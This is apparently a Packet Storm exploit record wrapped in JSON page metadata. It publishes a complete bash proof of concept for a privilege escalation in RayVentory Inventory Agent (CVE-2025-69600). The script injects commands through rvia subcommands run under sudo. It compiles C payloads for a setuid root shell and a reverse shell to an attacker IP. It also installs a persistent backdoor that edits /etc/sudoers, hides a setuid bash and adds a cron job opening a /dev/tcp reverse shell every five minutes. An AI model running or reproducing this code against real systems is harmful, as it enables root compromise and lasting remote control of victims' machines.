{“lastseen”:”2026-02-19T16:34:02″,”description”:”Proof of concept privilege escalation exploit for Raynet’s RayVentory Inventory Agent version 2.6.4392.49-amd64.deb…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:215862″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-69600″],”sourceData”:”=============================================================================================================================================\\n | # Title : Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/raynet.de\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : A privilege escalation vulnerability identified as CVE-2025-69600 affects certain versions of RayVentory Inventory Agent. \\n The issue arises from improper validation and insufficient restriction of privileged operations when executed through sudo configurations. \\n \\t\\t\\t\\t Under specific misconfigurations, a local authenticated user may be able to execute unintended commands with elevated privileges.\\n Successful exploitation could lead to full system compromise, including unauthorized modification of system files and persistence mechanisms. \\n \\t\\t\\t\\t Organizations using affected versions should review sudo configurations, restrict command execution scopes, and upgrade to a patched version as recommended by the vendor\\n \\n [+] POC : \\n \\n #!\/bin\/bash\\n \\n RED=’\\\\033[0;31m’\\n GREEN=’\\\\033[0;32m’\\n YELLOW=’\\\\033[1;33m’\\n BLUE=’\\\\033[0;34m’\\n NC=’\\\\033[0m’\\n VULNERABLE_VERSION=\\”12.6.4392.49\\”\\n TARGET_DIR=\\”\/tmp\\”\\n PAYLOAD_NAME=\\”rootme_$$\\” # Added PID to avoid conflict\\n BACKUP_DIR=\\”\/tmp\/.rvia_backup_$$\\”\\n LISTENER_PORT=\\”4444\\”\\n CVE_NUMBER=\\”CVE-2025-69600\\”\\n REVERSE_IP=\\”\\”\\n REVERSE_PORT=\\”4444\\”\\n LISTENER_PID=\\”\\”\\n CLEANUP_NEEDED=false\\n EXPLOIT_SUCCESS=false\\n \\n show_help() {\\n cat \\u003c\\u003c EOF\\n Exploit for $CVE_NUMBER – RayVentory Inventory Agent\\n Optimized Version 3.0\\n \\n Usage: $0 [options]\\n \\n Options:\\n -c, –check Only check for vulnerability\\n -e, –exploit Attempt local exploitation\\n -r, –reverse IP Reverse Shell (Example: -r 192.168.1.100)\\n -p, –port PORT Port (Default: 4444)\\n -b, –backdoor IP Install persistent backdoor\\n -h, –help Show help\\n \\n Examples:\\n $0 -c\\n $0 -e\\n $0 -r 192.168.1.100 -p 5555\\n $0 -b 192.168.1.100\\n EOF\\n exit 0\\n }\\n \\n cleanup() {\\n if [ \\”$CLEANUP_NEEDED\\” = true ]; then\\n echo -e \\”\\\\n${YELLOW}[*] Cleaning up temporary files…${NC}\\”\\n \\n rm -f \\”\/tmp\/$PAYLOAD_NAME\\” 2\\u003e\/dev\/null\\n rm -f \\”\/tmp\/$PAYLOAD_NAME.c\\” 2\\u003e\/dev\/null\\n rm -f \\”\/tmp\/malicious_$$.cfg\\” 2\\u003e\/dev\/null\\n \\n if [ -d \\”\/tmp\/bin_$$\\” ]; then\\n rm -rf \\”\/tmp\/bin_$$\\” 2\\u003e\/dev\/null\\n fi\\n \\n if [ -f \\”$BACKUP_DIR\/rvia.cfg\\” ]; then\\n if [ -f \\”\/opt\/rvia\/rvia.cfg\\” ]; then\\n cp \\”$BACKUP_DIR\/rvia.cfg\\” \\”\/opt\/rvia\/rvia.cfg\\” 2\\u003e\/dev\/null\\n fi\\n rm -rf \\”$BACKUP_DIR\\” 2\\u003e\/dev\/null\\n echo -e \\”${GREEN}[OK] Configuration file restored${NC}\\”\\n fi\\n if [ -n \\”$LISTENER_PID\\” ] \\u0026\\u0026 kill -0 \\”$LISTENER_PID\\” 2\\u003e\/dev\/null; then\\n kill \\”$LISTENER_PID\\” 2\\u003e\/dev\/null\\n sleep 1\\n kill -9 \\”$LISTENER_PID\\” 2\\u003e\/dev\/null\\n fi\\n \\n echo -e \\”${GREEN}[OK] Cleanup complete${NC}\\”\\n fi\\n exit 0\\n }\\n \\n trap cleanup SIGINT SIGTERM EXIT\\n \\n create_payload() {\\n local payload_type=$1\\n local payload_path=\\”\/tmp\/${PAYLOAD_NAME}.c\\”\\n local gcc_output\\n \\n echo -e \\”${BLUE}[*] Creating payload: $payload_type${NC}\\”\\n \\n case $payload_type in\\n \\”suid\\”)\\n cat \\u003e \\”$payload_path\\” \\u003c\\u003c ‘EOF’\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n \\n int main() {\\n if (setuid(0) != 0) {\\n return 1;\\n }\\n if (setgid(0) != 0) {\\n return 1;\\n }\\n execl(\\”\/bin\/bash\\”, \\”bash\\”, \\”-p\\”, NULL);\\n return 0;\\n }\\n EOF\\n ;;\\n \\”reverse\\”)\\n if [ -z \\”$REVERSE_IP\\” ]; then\\n echo -e \\”${RED}[!] Reverse shell IP not specified${NC}\\”\\n return 1\\n fi\\n cat \\u003e \\”$payload_path\\” \\u003c\\u003c EOF\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003csys\/socket.h\\u003e\\n #include \\u003carpa\/inet.h\\u003e\\n #include \\u003cfcntl.h\\u003e\\n \\n int main() {\\n int sock;\\n struct sockaddr_in server;\\n \\n sock = socket(AF_INET, SOCK_STREAM, 0);\\n if (sock \\u003c 0) return 1;\\n \\n server.sin_family = AF_INET;\\n server.sin_port = htons($REVERSE_PORT);\\n server.sin_addr.s_addr = inet_addr(\\”$REVERSE_IP\\”);\\n \\n if (connect(sock, (struct sockaddr *)\\u0026server, sizeof(server)) \\u003c 0) {\\n close(sock);\\n return 1;\\n }\\n \\n dup2(sock, 0);\\n dup2(sock, 1);\\n dup2(sock, 2);\\n \\n execl(\\”\/bin\/bash\\”, \\”bash\\”, NULL);\\n return 0;\\n }\\n EOF\\n ;;\\n \\”backdoor\\”)\\n if [ -z \\”$REVERSE_IP\\” ]; then\\n echo -e \\”${RED}[!] Backdoor IP not specified${NC}\\”\\n return 1\\n fi\\n cat \\u003e \\”$payload_path\\” \\u003c\\u003c EOF\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003ctime.h\\u003e\\n \\n int main() {\\n while(1) {\\n if (getuid() == 0) {\\n FILE *fp;\\n fp = fopen(\\”\/etc\/sudoers\\”, \\”a\\”);\\n if (fp) {\\n fprintf(fp, \\”\\\\\\\\nroot ALL=(ALL:ALL) NOPASSWD:ALL\\\\\\\\n\\”);\\n fclose(fp);\\n }\\n system(\\”cp \/bin\/bash \/tmp\/.hidden_bash \\u0026\\u0026 chmod 4755 \/tmp\/.hidden_bash\\”);\\n system(\\”echo ‘*\/5 * * * * root \/tmp\/.hidden_bash -c \\\\\\”bash -i \\u003e\\u0026 \/dev\/tcp\/$REVERSE_IP\/$REVERSE_PORT 0\\u003e\\u00261\\\\\\”‘ \\u003e\\u003e \/etc\/crontab\\”);\\n break;\\n }\\n sleep(5);\\n }\\n return 0;\\n }\\n EOF\\n ;;\\n *)\\n echo -e \\”${RED}[!] Unknown payload type: $payload_type${NC}\\”\\n return 1\\n ;;\\n esac\\n \\n if ! command -v gcc \\u0026\\u003e \/dev\/null; then\\n echo -e \\”${RED}[!] gcc is not installed${NC}\\”\\n return 1\\n fi\\n \\n gcc_output=$(gcc -Wall \\”$payload_path\\” -o \\”\/tmp\/$PAYLOAD_NAME\\” 2\\u003e\\u00261)\\n if [ $? -ne 0 ]; then\\n echo -e \\”${RED}[!] Failed to compile payload${NC}\\”\\n echo -e \\”${RED}$gcc_output${NC}\\”\\n return 1\\n fi\\n \\n chmod +x \\”\/tmp\/$PAYLOAD_NAME\\”\\n echo -e \\”${GREEN}[OK] Payload created successfully: \/tmp\/$PAYLOAD_NAME${NC}\\”\\n CLEANUP_NEEDED=true\\n return 0\\n }\\n \\n check_version() {\\n echo -e \\”${BLUE}[*] Checking RayVentory version…${NC}\\”\\n \\n local version=\\”\\”\\n local installed=false\\n \\n if command -v dpkg \\u0026\\u003e \/dev\/null; then\\n version=$(dpkg -l 2\\u003e\/dev\/null | grep rvia | awk ‘{print $3}’)\\n if [ -n \\”$version\\” ]; then\\n installed=true\\n fi\\n fi\\n \\n if [ \\”$installed\\” = false ] \\u0026\\u0026 [ -f \\”\/opt\/rvia\/rvia\\” ]; then\\n version=$(\/opt\/rvia\/rvia –version 2\\u003e\/dev\/null | head -n1 | grep -oE ‘[0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+’)\\n if [ -n \\”$version\\” ]; then\\n installed=true\\n fi\\n fi\\n \\n if [ \\”$installed\\” = false ]; then\\n echo -e \\”${RED}[!] RayVentory is not installed on the system${NC}\\”\\n return 1\\n fi\\n \\n echo -e \\”${GREEN}[OK] Installed version: $version${NC}\\”\\n \\n if command -v dpkg \\u0026\\u003e \/dev\/null; then\\n if dpkg –compare-versions \\”$version\\” le \\”$VULNERABLE_VERSION\\” 2\\u003e\/dev\/null; then\\n echo -e \\”${GREEN}[OK] System is vulnerable to $CVE_NUMBER${NC}\\”\\n return 0\\n else\\n echo -e \\”${RED}[!] Version $version is newer than the known vulnerable version${NC}\\”\\n echo -e \\”${YELLOW}[!] System might not be vulnerable${NC}\\”\\n return 1\\n fi\\n else\\n echo -e \\”${YELLOW}[!] Cannot accurately verify vulnerability status${NC}\\”\\n echo -e \\”${YELLOW}[!] Proceeding with exploitation attempt at your own risk${NC}\\”\\n return 0\\n fi\\n }\\n \\n check_sudo() {\\n echo -e \\”${BLUE}[*] Checking sudo privileges…${NC}\\”\\n \\n if ! command -v sudo \\u0026\\u003e \/dev\/null; then\\n echo -e \\”${RED}[!] sudo is not installed${NC}\\”\\n return 1\\n fi\\n \\n if ! sudo -n true 2\\u003e\/dev\/null; then\\n echo -e \\”${YELLOW}[!] sudo may require a password${NC}\\”\\n echo -e \\”${YELLOW}[*] Please enter password if prompted${NC}\\”\\n fi\\n \\n local sudo_config=$(sudo -l 2\\u003e\\u00261)\\n \\n if echo \\”$sudo_config\\” | grep -q \\”sorry, a password is required\\”; then\\n echo -e \\”${RED}[!] sudo password required but not provided${NC}\\”\\n return 1\\n fi\\n \\n if ! echo \\”$sudo_config\\” | grep -q \\”rvia\\”; then\\n echo -e \\”${RED}[!] No sudo privileges found for rvia${NC}\\”\\n return 1\\n fi\\n \\n echo -e \\”${GREEN}[OK] sudo privileges exist${NC}\\”\\n \\n local patterns=(\\n \\”rvia[[:space:]]*\\\\*\\”\\n \\”rvia[[:space:]]+getconfig\\”\\n \\”rvia[[:space:]]+upload\\”\\n \\”rvia[[:space:]]+inventory\\”\\n \\”rvia[[:space:]]+oracle\\”\\n \\”(root)[[:space:]]*\\”\\n \\”(ALL[[:space:]]*:[[:space:]]*ALL)\\”\\n \\”(ALL)[[:space:]]*\\”\\n )\\n \\n local found=0\\n for pattern in \\”${patterns[@]}\\”; do\\n if echo \\”$sudo_config\\” | grep -qE \\”$pattern\\”; then\\n found=1\\n echo -e \\”${GREEN}[OK] Found exploitable pattern: $pattern${NC}\\”\\n break\\n fi\\n done\\n \\n if [ $found -eq 1 ]; then\\n echo -e \\”${GREEN}[OK] Configuration is exploitable!${NC}\\”\\n return 0\\n else\\n echo -e \\”${YELLOW}[!] Configuration may not be directly exploitable${NC}\\”\\n return 0\\n fi\\n }\\n \\n exploit_single_method() {\\n local method=$1\\n local cmd=\\”\/tmp\/$PAYLOAD_NAME\\”\\n local temp_cfg=\\”\/tmp\/malicious_$$.cfg\\”\\n \\n echo -e \\”${BLUE}[*] Attempting exploit using: $method${NC}\\”\\n \\n if [ ! -d \\”$BACKUP_DIR\\” ] \\u0026\\u0026 [ -f \\”\/opt\/rvia\/rvia.cfg\\” ]; then\\n mkdir -p \\”$BACKUP_DIR\\”\\n cp \\”\/opt\/rvia\/rvia.cfg\\” \\”$BACKUP_DIR\/\\” 2\\u003e\/dev\/null\\n fi\\n \\n case $method in\\n \\”getconfig\\”)\\n sudo \/opt\/rvia\/rvia getconfig \\\\\\”;$cmd;\\\\\\” 2\\u003e\/dev\/null\\n ;;\\n \\”upload\\”)\\n mkdir -p \\”\/opt\/rvia\/results\\” 2\\u003e\/dev\/null\\n touch \\”\/opt\/rvia\/results\/test_$$.xml\\” 2\\u003e\/dev\/null\\n sudo \/opt\/rvia\/rvia upload \\\\\\”\\\\;$cmd\\\\;#\\\\\\” 2\\u003e\/dev\/null\\n ;;\\n \\”inventory\\”)\\n sudo \/opt\/rvia\/rvia inventory \\\\\\”;$cmd;\\\\\\” 2\\u003e\/dev\/null\\n ;;\\n \\”oracle\\”)\\n \\n local bin_dir=\\”\/tmp\/bin_$$\\”\\n mkdir -p \\”$bin_dir\\” 2\\u003e\/dev\/null\\n ln -sf \\”\/tmp\/$PAYLOAD_NAME\\” \\”$bin_dir\/java\\” 2\\u003e\/dev\/null\\n \\n cat \\u003e \\”$temp_cfg\\” \\u003c\\u003c EOF\\n javaPaths=$bin_dir\/\\n EOF\\n cp \\”$temp_cfg\\” \\”\/opt\/rvia\/rvia.cfg\\” 2\\u003e\/dev\/null\\n \\n sudo \/opt\/rvia\/rvia oracle test 2\\u003e\/dev\/null\\n ;;\\n \\”config\\”)\\n cat \\u003e \\”$temp_cfg\\” \\u003c\\u003c EOF\\n configDownloadSource=http:\/\/127.0.0.1:$LISTENER_PORT\/malicious\\n schedule:command:$cmd * * * * *\\n EOF\\n cp \\”$temp_cfg\\” \\”\/opt\/rvia\/rvia.cfg\\” 2\\u003e\/dev\/null\\n \\n (\\n timeout 5 nc -l -p \\”$LISTENER_PORT\\” -q 1 2\\u003e\/dev\/null \\u003c\\u003c EOF\\n HTTP\/1.1 200 OK\\n Content-Type: text\/plain\\n \\n malicious\\n EOF\\n ) \\u0026\\n LISTENER_PID=$!\\n sleep 2\\n \\n sudo \/opt\/rvia\/rvia getconfig 2\\u003e\/dev\/null\\n ;;\\n esac\\n \\n sleep 3\\n }\\n \\n check_success() {\\n local payload=\\”\/tmp\/$PAYLOAD_NAME\\”\\n \\n if [ ! -f \\”$payload\\” ]; then\\n return 1\\n fi\\n \\n if [ -u \\”$payload\\” ]; then\\n echo -e \\”${GREEN}[OK] Privilege escalation successful!${NC}\\”\\n echo -e \\”${GREEN}[OK] Launching root shell…${NC}\\”\\n EXPLOIT_SUCCESS=true\\n \\”$payload\\”\\n return 0\\n fi\\n \\n if command -v stat \\u0026\\u003e \/dev\/null; then\\n local perms=$(stat -c \\”%A\\” \\”$payload\\” 2\\u003e\/dev\/null)\\n if [[ $perms == *s* ]]; then\\n echo -e \\”${GREEN}[OK] Privilege escalation successful (stat)!${NC}\\”\\n EXPLOIT_SUCCESS=true\\n \\”$payload\\”\\n return 0\\n fi\\n fi\\n \\n return 1\\n }\\n \\n try_all_methods() {\\n local methods=(\\”getconfig\\” \\”upload\\” \\”inventory\\” \\”oracle\\” \\”config\\”)\\n local success=1 \\n \\n for method in \\”${methods[@]}\\”; do\\n exploit_single_method \\”$method\\”\\n \\n if check_success; then\\n success=0 \\n break\\n fi\\n \\n # Restore configuration file after each failed attempt\\n if [ -f \\”$BACKUP_DIR\/rvia.cfg\\” ]; then\\n cp \\”$BACKUP_DIR\/rvia.cfg\\” \\”\/opt\/rvia\/rvia.cfg\\” 2\\u003e\/dev\/null\\n fi\\n done\\n \\n return $success \\n }\\n \\n \\n install_backdoor() {\\n echo -e \\”${BLUE}[*] Installing persistent backdoor…${NC}\\”\\n \\n if [ -z \\”$REVERSE_IP\\” ]; then\\n echo -e \\”${RED}[!] Backdoor IP must be specified${NC}\\”\\n return 1\\n fi\\n \\n if create_payload \\”backdoor\\”; then\\n if try_all_methods; then\\n echo -e \\”${GREEN}[OK] Backdoor installed successfully${NC}\\”\\n echo -e \\”${YELLOW}[*] Reverse shell to $REVERSE_IP:$REVERSE_PORT every 5 minutes${NC}\\”\\n return 0\\n else\\n echo -e \\”${RED}[!] Failed to install backdoor${NC}\\”\\n return 1\\n fi\\n fi\\n }\\n \\n main() {\\n \\n local CHECK_ONLY=false\\n local EXPLOIT=false\\n local BACKDOOR=false\\n local REVERSE=false\\n \\n while [[ $# -gt 0 ]]; do\\n case $1 in\\n -c|–check)\\n CHECK_ONLY=true\\n shift\\n ;;\\n -e|–exploit)\\n EXPLOIT=true\\n shift\\n ;;\\n -r|–reverse)\\n REVERSE=true\\n if [ -z \\”$2\\” ] || [[ \\”$2\\” =~ ^- ]]; then\\n echo -e \\”${RED}[!] IP required for reverse shell${NC}\\”\\n exit 1\\n fi\\n REVERSE_IP=\\”$2\\”\\n shift 2\\n ;;\\n -p|–port)\\n if [ -z \\”$2\\” ] || [[ \\”$2\\” =~ ^- ]]; then\\n echo -e \\”${RED}[!] Port number required${NC}\\”\\n exit 1\\n fi\\n if ! [[ \\”$2\\” =~ ^[0-9]+$ ]] || [ \\”$2\\” -lt 1 ] || [ \\”$2\\” -gt 65535 ]; then\\n echo -e \\”${RED}[!] Invalid port: $2${NC}\\”\\n exit 1\\n fi\\n REVERSE_PORT=\\”$2\\”\\n shift 2\\n ;;\\n -b|–backdoor)\\n BACKDOOR=true\\n if [ -z \\”$2\\” ] || [[ \\”$2\\” =~ ^- ]]; then\\n echo -e \\”${RED}[!] IP required for backdoor${NC}\\”\\n exit 1\\n fi\\n REVERSE_IP=\\”$2\\”\\n shift 2\\n ;;\\n -h|–help)\\n show_help\\n ;;\\n *)\\n echo -e \\”${RED}Unknown option: $1${NC}\\”\\n show_help\\n ;;\\n esac\\n done\\n \\n if [ ! -f \\”\/opt\/rvia\/rvia\\” ]; then\\n echo -e \\”${RED}[!] RayVentory is not installed at \/opt\/rvia\/rvia${NC}\\”\\n exit 1\\n fi\\n \\n if [ \\”$CHECK_ONLY\\” = true ]; then\\n check_version \\u0026\\u0026 check_sudo\\n exit $?\\n fi\\n \\n if [ \\”$BACKDOOR\\” = true ]; then\\n check_version \\u0026\\u0026 check_sudo \\u0026\\u0026 install_backdoor\\n exit $?\\n fi\\n \\n if [ \\”$REVERSE\\” = true ]; then\\n check_version \\u0026\\u0026 check_sudo \\u0026\\u0026 create_payload \\”reverse\\” \\u0026\\u0026 try_all_methods\\n if [ $? -eq 0 ] \\u0026\\u0026 [ \\”$EXPLOIT_SUCCESS\\” = false ]; then\\n echo -e \\”${RED}[!] Exploit failed${NC}\\”\\n exit 1\\n fi\\n exit 0\\n fi\\n \\n if [ \\”$EXPLOIT\\” = true ]; then\\n check_version \\u0026\\u0026 check_sudo \\u0026\\u0026 create_payload \\”suid\\” \\u0026\\u0026 try_all_methods\\n if [ $? -eq 0 ] \\u0026\\u0026 [ \\”$EXPLOIT_SUCCESS\\” = false ]; then\\n echo -e \\”${RED}[!] Exploit failed${NC}\\”\\n exit 1\\n fi\\n exit 0\\n fi\\n \\n show_help\\n }\\n \\n main \\”$@\\”\\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215862″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215862\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-19T16:34:02″,”description”:”Proof of concept privilege escalation exploit for Raynet’s RayVentory Inventory Agent version 2.6.4392.49-amd64.deb…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:215862″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-69600″],”sourceData”:”=============================================================================================================================================\\n | # Title : Raynet rvia 2.6.4392.49-amd64.deb…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41671","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n